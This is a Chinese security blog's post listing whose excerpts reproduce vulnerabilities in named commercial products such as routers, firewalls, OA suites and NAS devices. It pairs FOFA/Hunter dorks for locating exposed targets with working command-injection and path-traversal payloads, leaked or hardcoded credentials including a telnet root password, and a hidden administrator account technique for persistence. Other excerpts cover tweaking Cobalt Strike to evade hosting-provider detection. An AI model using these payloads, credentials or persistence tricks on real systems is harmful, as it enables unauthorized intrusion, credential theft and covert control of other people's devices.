- 博客(65)
- 收藏
- 关注
原创 泛微 E-cology V9 信息泄露漏洞
泛微OA E-Cology信息泄露 API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口
2022-06-18 21:19:34
5402
6
原创 中科网威 下一代防火墙控制系统 账号密码泄露漏洞
漏洞描述i ⭐中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台漏洞影响s ✅中科网威 下一代防火墙控制系统空间测绘d ⭕FOFA:body="Get_Verify_Info(hex_md5(user_string)."漏洞复现访问后登录页面如下✅ F12查看前端发现 admin的md5加密密码var persons = [{"name":"admin","password":"64ef657e3414cd
2022-04-27 10:03:29
1896
1
原创 帆软报表 2012 信息泄露漏洞导致RCE
漏洞描述i ⭐帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息漏洞影响s ✅帆软报表 2012空间测绘d ⭕FOFA:body="down.download?FM_SYS_ID"漏洞复现访问ip日志EXPhttp://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false✅ 数据库信息泄露http://xxx.xxx
2022-04-25 22:20:30
5678
原创 JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
漏洞描述i ⭐JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck漏洞影响s ✅JD-FreeFuck空间测绘d ⭕FOFA:title="京东薅羊毛控制面板"漏洞复现访问后登录页面如下✅ 默认账号useradmin/supermanitoPOST /runCmd HTTP/1.1cmd=bash+jd.sh+%3
2022-04-22 22:46:52
2685
原创 TVT数码科技 NVMS-1000 路径遍历漏洞(CVE-2019-20085)
漏洞描述i ⭐TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件漏洞影响s ✅TVT NVMS-1000空间测绘d ⭕FOFA:app="TVT-NVMS-1000"漏洞复现访问首页✅ expGET /../../../../../../../../../../../../window
2022-04-19 22:36:23
1363
1
原创 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
漏洞描述i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行漏洞影响s ✅蓝海卓越计费管理系统空间测绘d ⭕Hunter:web.title="蓝海卓越计费管理系统"漏洞复现✅访问首页✅执行Payload命令,访问路径/debug.php$ ifconfigeth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27inet addr:192.168.0.1 Bcast:192.168.
2022-04-18 13:18:00
2988
1
原创 锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)
漏洞描述i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限漏洞影响s ✅锐捷NBR路由器 EWEB网管系统空间测绘d ⭕FOFA:title="锐捷网络-EWEB网管系统"⭕FOFA:icon_hash="-692947551"漏洞复现✅访问首页✅执行Payload命令POST /guest_auth/guestIsUp.phpmac=1&ip=127.0.0.1|cat /etc/passwd > test.tx
2022-04-14 21:46:03
11408
1
原创 锐捷 Smartweb管理系统 密码信息泄露漏洞
漏洞描述i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。漏洞影响s ✅锐捷网络股份有限公司 无线smartweb管理系统空间测绘d ⭕FOFA:title="无线smartWeb--登录页面"漏洞复现✅访问首页,存在账号guest/guest登陆而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到访问未授权路径/web/xml/webuser-auth.
2022-04-10 15:10:50
2134
原创 锐捷 云课堂主机 pool 目录遍历漏洞
漏洞描述i ⭐锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.漏洞影响s ✅锐捷云课堂空间测绘d ⭕FOFA:title="Ruijie" && "云课堂主机"漏洞复现✅访问 http://1.1.1.1/pool目录遍历Directory Listing For /Filename Size Last Modified Packages.gz 490.8 kb Fri, 26 May 2017 00:
2022-04-09 08:32:15
3044
原创 佑友防火墙 后台命令执行漏洞
漏洞描述i ⭐佑友防火墙 后台维护工具存在命令执行,由于没有过滤危险字符,导致可以执行任意命令漏洞影响s ✅佑友防火墙空间测绘d ⭕FOFA:title="佑友防火墙"漏洞复现登陆页面✅默认账号密码为 admin/hicomadmin127.0.0.1|whoami127.0.0.1|cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2
2022-04-07 12:30:21
1858
原创 宏电 H8922 Telnet后门漏洞(CVE-2021-28149)
漏洞描述i ⭐宏电 H8922 Telnet存在硬编码的账号密码 且默认开放 5188端口连接,可以以Root身份获取权限漏洞影响s ✅宏电 H8922空间测绘d ⭕ZoomEy:app:"Hongdian H8922 Industrial Router"漏洞复现搜索✅ Telnet连接目标5188端口,账号密码为 root/superzxmn...
2022-04-06 17:24:52
1868
原创 Kyan 网络监控设备 hosts 账号密码泄露漏洞
漏洞描述Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限漏洞影响s ✅Kyan空间测绘d ⭕title="platform - Login"漏洞复现✅登陆页面如下漏洞urlhttp://127.0.0.1/hosts个人博客孤桜懶契:https://gylq.gitee.io/time...
2022-04-05 20:25:31
1226
原创 智慧校园管理系统 前台任意文件上传漏洞
漏洞描述智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器漏洞影响s ✅智慧校园管理系统空间测绘d ⭕body="DC_Login/QYSignUp"漏洞复现✅企业注册界面存在漏洞上传附件上传一个冰蝎马会有返回路径连接地址个人博客孤桜懶契:https://gylq.gitee.io/time...
2022-03-31 21:36:33
4227
原创 狮子鱼CMS image_upload.php 任意文件上传
漏洞描述网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞,漏洞复现以及漏洞工具分享。漏洞影响s ✅狮子鱼CMS空间测绘d ⭕FOFA:"/seller.php?s=/Public/login"漏洞复现POCPOST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1Host: ipContent-Type
2022-03-29 16:45:00
4629
原创 Nostromo 1.9.6 远程代码执行漏洞(CVE-2019-16278)
漏洞描述用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。漏洞影响s ✅Nostromo 1.9.6空间测绘d ⭕hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server==
2022-03-28 16:37:38
1279
原创 TerraMaster TOS createRaid 远程命令执行(CVE-2022-24990)
漏洞描述TerraMaster TOS mobile.class.php文件的createRaid办法存在远程命令执行破绽 ,攻击者配合 CVE-2022-24990破绽能够获取效劳器权限漏洞影响TerraMaster TOS < 4.2.31空间测绘d ⭕FOFA:“TOS Loading” && country=“CN”漏洞复现首页访问信息泄露写入phpinfo脚本地址https://github.com/lishang520/CVE
2022-03-27 21:53:30
1738
1
原创 Apache APISIX Dashboard 任意命令执行批量编写工具
Apache APISIX Dashboard远程命令执行漏洞(CVE-2021-45232)漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API
2022-01-16 20:56:55
2496
原创 【知识积累】win下权限维持+留后门
前言大晚上的,最近也积累知识一些拿机子该如何不让机子挂掉呢,马不一定能保证你不会挂掉(免杀也许可以)但我还太菜,先来个windows下的一些技巧吧,实战还是很有意义的,可以让对方很难找到你的后门第一阶段-隐藏用户我拿实战做个案例,这个我感觉大家可能都知道,但是还是说一下,隐藏用户指的是无法单纯从net user中看到的用户,也就是说用户名加上一个$net user admin$ ***** /add #比如这样的net localgroup administrators administr
2022-01-07 15:47:04
2074
原创 【知识积累】CS4.4绕过vultr特征检测修改checksum8算法
前言众所周知,关于cs相关的资料都非常的少,并且是打得特别紧,特别是这两年各个安全厂商对cs相关的内容都给予了特征识别等严重的打击,例如vultr网站会检测特征并关停服务器,我们可以同个多种方式更改特征绕过,接下来我们来讲更改cs的算法进行绕过。例如下面这样我弄的环境,就因为开了cs结果就被强制破坏o(╥﹏╥)o特征检测关于被检测的特征详细来概述首先我们新建监听器这里我们一般用80和443来监听,因为其他端口的容易被封,这俩端口基本没人去管接下来我们打开特征的的一些链接看下
2022-01-07 15:45:40
4863
原创 Apache APISIX Dashboard 任意命令执行CVE-2021-45232
Apache APISIX Dashboard远程命令执行漏洞(CVE-2021-45232)漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API
2022-01-07 15:43:58
2479
原创 【远控使用】Cobalt Strike横向渗透域控
categories: 知识积累top: FALSEcopyright: trueabbrlink: 1643719980#date: '2021-8-7 12:00:00'#description:1400x780tags: 内网渗透提权渗透测试黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png前言Cobalt Strike.
2021-09-11 11:43:45
2495
原创 【提权】提权扫描工具方法
前言提权扫描工具使用Windows-Exploit-SuggesterWindows-Exploit-Suggester这个工具很强,但是依赖更新了,所以有几个坑,我记录一下1、安装git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git2、安装依赖(有坑)由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令python -m
2021-08-23 12:09:45
440
原创 【封神台】漏洞挖掘XXE wp
前言掌控安全里面的靶场漏洞挖掘XXE实体注入,学习一下!做XXE题目之前我们先了解一下XXE实体注入的原理和利用方法XXE基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:元素、属性、实体、PCDATA、CDATA,由于网上太多介绍就不详细说了DTD(文档类型定
2021-08-23 05:31:43
605
原创 【提权】metasploit提权方法
前言metasploit 提权使用常用的提权模块metasploit 提权EXP存储文件夹路径find / -name metasploit一般都在/usr/share/metasploit-framework/modules/exploits/windows/localwindows2003提权环境:2003 server1、生成攻击载荷msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lpo
2021-08-22 22:13:45
904
原创 【ctfshow】web篇-SQL注入 wp
前言记录web的题目wp,慢慢变强,铸剑。SQL注入web171根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过//拼接sql语句查找指定ID用户$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行判断有3个字段
2021-08-21 22:25:42
4686
1
原创 ctfshow-ssrf
前言记录web的题目wp,慢慢变强,铸剑。SSRFSSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相关而与外部网隔离的内部系统)web351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=cu
2021-08-21 20:32:40
392
原创 【封神台】数据库注入 wp
前言掌控安全里面的靶场前端渗透/XSS,学习一下!反射型XSS环境:http://b-ref-xss-1s.lab.aqlab.cn/了解一下一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了XSS一般在什么业务场景容易遇见?重灾区:评论区、留言区、个人信息、订单信息等。针对型:站内信、网页即时通讯、私信、意见反馈。存在风险:搜索框、当前目录、图片属性等。遵循一个原则,见框就X发现并没有什么反应,审计元素看看代码F12
2021-08-15 16:55:08
470
原创 【封神台】数据库注入 wp
前言掌控安全里面的靶场数据库注入,练练手!Access——Cookie注入环境http://59.63.200.79:8004/正常情况Cookie注入是可以通过post传参测试的上面通过改id的参数发现可以cookie注入,废话不多说,抓包,sqlmap走起python2 sqlmap.py -r 123.txt --batch --threads=10 -T admin --dumpMD5解密b9a2a2b5dffb918c ——>
2021-08-15 16:54:26
492
原创 【封神台】漏洞挖掘与代码审计 wp
前言掌控安全里面的靶场漏洞挖掘与代码审计,练练手!本地包含漏洞审计环境 :http://wjbh522a.zs.aqlab.cn/默认弱密码登陆 admin admin登陆之后发现是个4.8.1的版本,其实这题做的方法太多了,也可以不用代码审计,网上有一堆payload远程文件包含,不过这个靶场说下源代码审计,那就看看。下载源码:https://www.phpmyadmin.net/files/4.8.1/因为提示说了文件包含,直接全局搜索include分析
2021-08-15 16:53:45
673
原创 【SQL注入】UDF提权命令执行
一、什么是udfudf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。udf 文件后缀一般为 dll,由C、C++编写二、udf在渗透中的作用在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
2021-08-15 16:53:06
4451
2
原创 【封神台】Sql-Labs wp
前言掌控安全里面的靶场Sql-Labs,练练手!环境:http://inject2.lab.aqlab.cn:81/pass-01$username = '';$password = '';@$id = $_GET['id'];@$sql = 'select *from user where id='.$id;mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($
2021-08-15 16:52:19
538
原创 【封神台】upload-labs wp
前言掌控安全里面的靶场upload-labs,练练手!环境:http://59.63.200.79:8016/pass-01function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; }
2021-07-24 15:53:28
399
原创 【小知识】windows中java同时两个版本java8和java16混用
jdk8 和jdk16以及其他版本同时安装混合使用方法一、首先去下载jdk8和jdk16jdk16-https://www.oracle.com/java/technologies/javase-jdk16-downloads.htmljdk-8u291-https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html二、环境配置变量(此电脑->属性->高级系统设置->环境变量)
2021-07-05 15:59:20
2614
1
原创 【嗅探工具】wireshark初步认识
Wireshark初步使用安装下载地址:https://www.wireshark.org/#download过滤器的使用方法http.request.method =="POST"or icmp.typeip.addr == 192.168.1.101ip.src == 192.168.1.101/16(来源是这个网段的显示)http.hos == “192.168.88.132” 显示主机相关的数据包tcp.port == 25 显示端口号为25的数据
2021-06-22 13:39:44
196
1
原创 【嗅探工具】无线WIFI密码破解
前言本文仅介绍通过抓取握手包的方式破解WPA/WPA2的密码,用到的工具是Kali Linux自带的airmon-ng,以及地表最强密码破解工具hashcat(可选)。Aircrack-ng破解wifi使用的几个套件aircrack-ng 破解WEP以及WPA(字典攻击)密钥airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据airmon-ng 将网卡设定为监听模式aireplay-ng 数据包注入工具airodump-ng 数据包嗅探:将无线网络数据
2021-06-22 13:38:46
11676
5
原创 【漏洞工具】Metasploit框架爆破模块
MSF - 爆破模块环境http://www.phpstudy.net查找爆破模块的姿势1、查找服务名search type:auxiliary ssh2、查找服务器+关键词3、 SSH密码爆破4、Mysql密码爆破5、phpmyadmin登陆验证爆破案例:phpMyAdmin爆破实操环境http://59.63.200.79:8805/phpmyadmin/...
2021-06-19 17:16:52
213
原创 【漏洞工具】Metasploit框架永恒之蓝
MSF - 爆破模块环境http://www.phpstudy.net查找爆破模块的姿势1、查找服务名search type:auxiliary ssh2、查找服务器+关键词3、 SSH密码爆破4、Mysql密码爆破5、phpmyadmin登陆验证爆破案例:phpMyAdmin爆破实操环境http://59.63.200.79:8805/phpmyadmin/...
2021-06-19 16:37:24
457
原创 【漏洞工具】Metasploit框架基本命令
MSF—基础命令一、开启数据库:service postgresql start (作用是加快开启速度)二、开启MSF: msfconsole三、help命令常规模块show payloads(载荷)show auxiliary (辅助)show exploits(利用)命名规则:操作系统/服务/名称 windows/smb/ms17_010_eternalblue显示模块信息:info windows/smb/ms17_010_eternalblue根据
2021-06-19 16:36:30
193
原创 【破解工具】Hashcat加密破解工具
hash密码破解工具 - Hashcat下载地址:https://hashcat.net/files/hashcat-6.2.2.7z(使用前提是你在线解密工具不行时)我的博客:http://gylq.github.io扫描模式Mode0代号Straight(字典破解):基于字典进行破解1代号Combination(组合破解):基于多个字典进行破解3代号Brute-force(掩码暴力破解):基于掩码设置进行破解6代号Hybrid Wordlist + Mask(字典+掩码破解)
2021-06-17 22:27:40
3053
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人